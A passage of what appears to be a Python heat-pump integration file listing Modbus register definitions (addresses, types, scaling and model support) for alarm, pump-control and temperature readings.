ATTR_DINPUT_FLOW_PRESSURE_SWITCH_ALARM:
{ KEY_ADDRESS: 16, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_POWER_INPUT_PHASE_DETECTION_ALARM:
{ KEY_ADDRESS: 22, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_INVERTER_UNIT_ALARM:
{ KEY_ADDRESS: 23, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SYSTEM_SUPPLY_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 24, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COMPRESSOR_LOW_SPEED_ALARM:
{ KEY_ADDRESS: 25, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_LOW_SUPER_HEAT_ALARM:
{ KEY_ADDRESS: 26, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_PRESSURE_RATIO_OUT_OF_RANGE_ALARM:
{ KEY_ADDRESS: 27, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COMPRESSOR_PRESSURE_OUTSIDE_ENVELOPE_ALARM:
{ KEY_ADDRESS: 28, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_TEMPERATURE_OUT_OF_RANGE_ALARM:
{ KEY_ADDRESS: 29, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_IN_SENSOR_ALARM:
{ KEY_ADDRESS: 30, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_OUT_SENSOR_ALARM:
{ KEY_ADDRESS: 31, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_CONDENSER_IN_SENSOR_ALARM:
{ KEY_ADDRESS: 32, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_CONDENSER_OUT_SENSOR_ALARM:
{ KEY_ADDRESS: 33, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_OUTDOOR_SENSOR_ALARM:
{ KEY_ADDRESS: 34, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SYSTEM_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 35, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_1_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 36, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_2_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 37, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_3_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 38, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_4_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 39, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_5_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 40, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_WCS_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 44, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_TWC_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 45, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COOLING_TANK_SENSOR_ALARM:
{ KEY_ADDRESS: 46, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COOLING_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 47, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COOLING_CIRCUIT_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 48, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_BRINE_DELTA_OUT_OF_RANGE_ALARM:
{ KEY_ADDRESS: 49, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TAP_WATER_MID_SENSOR_ALARM:
{ KEY_ADDRESS: 50, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TWC_CIRCULATION_RETURN_SENSOR_ALARM:
{ KEY_ADDRESS: 51, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HGW_SENSOR_ALARM:
{ KEY_ADDRESS: 52, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_INTERNAL_ADDITIONAL_HEATER_ALARM:
{ KEY_ADDRESS: 53, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_IN_HIGH_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 55, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_IN_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 56, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_BRINE_OUT_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 57, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TWC_CIRCULATION_RETURN_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 58, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TWC_SUPPLY_LOW_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 59, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_1_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 60, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_2_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 61, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_3_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 62, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_4_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 63, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_5_SUPPLY_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 64, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_WCS_RETURN_LINE_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 65, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SUM_ALARM:
{ KEY_ADDRESS: 66, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COOLING_CIRCUIT_SUPPLY_LINE_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 67, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COOLING_TANK_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 68, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_TEMPERATURE_DEVIATION_ALARM:
{ KEY_ADDRESS: 69, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_HUMIDITY_ROOM_SENSOR_ALARM:
{ KEY_ADDRESS: 70, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_SUPPLY_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 71, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 72, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COOLING_TANK_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 73, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_TEMPERATURE_ROOM_SENSOR_ALARM:
{ KEY_ADDRESS: 74, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_INVERTER_UNIT_COMMUNICATION_ALARM:
{ KEY_ADDRESS: 75, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_POOL_RETURN_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 76, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_STOP_FOR_POOL:
{ KEY_ADDRESS: 77, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_START_BRINE_PUMP:
{ KEY_ADDRESS: 78, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_RELAY_FOR_BRINE_GROUND_WATER_PUMP:
{ KEY_ADDRESS: 79, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_TAP_WATER_END_TANK_SENSOR_ALARM:
{ KEY_ADDRESS: 81, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MAXIMUM_TIME_FOR_ANTI_LEGIONELLA_EXCEEDED_ALARM:
{ KEY_ADDRESS: 82, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_GENESIS_SECONDARY_UNIT_ALARM:
{ KEY_ADDRESS: 83, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_PRIMARY_UNIT_CONFLICT_ALARM:
{ KEY_ADDRESS: 84, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_PRIMARY_UNIT_NO_SECONDARY_ALARM:
{ KEY_ADDRESS: 85, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_OIL_BOOST_IN_PROGRESS:
{ KEY_ADDRESS: 86, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COMPRESSOR_CONTROL_SIGNAL:
{ KEY_ADDRESS: 199, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SMART_GRID_1:
{ KEY_ADDRESS: 201, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_ALARM_INPUT:
{ KEY_ADDRESS: 202, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SMART_GRID_2:
{ KEY_ADDRESS: 204, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_ADDITIONAL_HEATER_CONTROL_SIGNAL:
{ KEY_ADDRESS: 206, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_MIX_VALVE_1_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 209, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_CONDENSER_PUMP_ON_OFF_CONTROL:
{ KEY_ADDRESS: 210, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SYSTEM_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 211, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HOT_GAS_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 213, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_BRINE_PUMP_ON_OFF_CONTROL:
{ KEY_ADDRESS: 218, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_HEATER_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 219, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HEATING_SEASON_ACTIVE:
{ KEY_ADDRESS: 220, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_EXTERNAL_ADDITIONAL_HEATER_ACTIVE:
{ KEY_ADDRESS: 221, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_INTERNAL_ADDITIONAL_HEATER_ACTIVE:
{ KEY_ADDRESS: 222, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_HGW_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 223, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_DINPUT_HEAT_PUMP_STOPPING:
{ KEY_ADDRESS: 224, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HEAT_PUMP_OK_TO_START:
{ KEY_ADDRESS: 225, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_TWC_SUPPLY_LINE_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 230, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_WCS_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 232, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_WCS_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 233, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_TWC_END_TANK_HEATER_CONTROL_SIGNAL:
{ KEY_ADDRESS: 234, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_POOL_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 235, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COOLING_CIRCUIT_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 236, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_POOL_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 237, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SURPLUS_HEAT_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 238, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_CIRCULATION_PUMP_CONTROL_SIGNAL:
{ KEY_ADDRESS: 239, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_COOLING_CIRCUIT_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 240, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_SURPLUS_HEAT_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 241, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_ACTIVE_COOLING_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 242, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_PASSIVE_ACTIVE_COOLING_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 243, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_POOL_REGULATION_CONTROL_SIGNAL:
{ KEY_ADDRESS: 244, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_INDICATION_WHEN_MIXING_VALVE_1_IS_PRODUCING_PASSIVE_COOLING:
{ KEY_ADDRESS: 245, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_COMPRESSOR_IS_UNABLE_TO_SPEED_UP:
{ KEY_ADDRESS: 246, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_FIRST_PRIORITISED_DEMAND:
{ KEY_ADDRESS: 1, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_AVAILABLE_GEARS:
{ KEY_ADDRESS: 4, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_SPEED_RPM:
{ KEY_ADDRESS: 5, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_EXTERNAL_ADDITIONAL_HEATER_CURRENT_DEMAND:
{ KEY_ADDRESS: 6, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DISCHARGE_PIPE_TEMPERATURE:
{ KEY_ADDRESS: 7, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_CONDENSER_IN_TEMPERATURE:
{ KEY_ADDRESS: 8, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_CONDENSER_OUT_TEMPERATURE:
{ KEY_ADDRESS: 9, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BRINE_IN_TEMPERATURE:
{ KEY_ADDRESS: 10, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BRINE_OUT_TEMPERATURE:
{ KEY_ADDRESS: 11, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SYSTEM_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 12, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_OUTDOOR_TEMPERATURE:
{ KEY_ADDRESS: 13, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TAP_WATER_TOP_TEMPERATURE:
{ KEY_ADDRESS: 15, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TAP_WATER_LOWER_TEMPERATURE:
{ KEY_ADDRESS: 16, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TAP_WATER_WEIGHTED_TEMPERATURE:
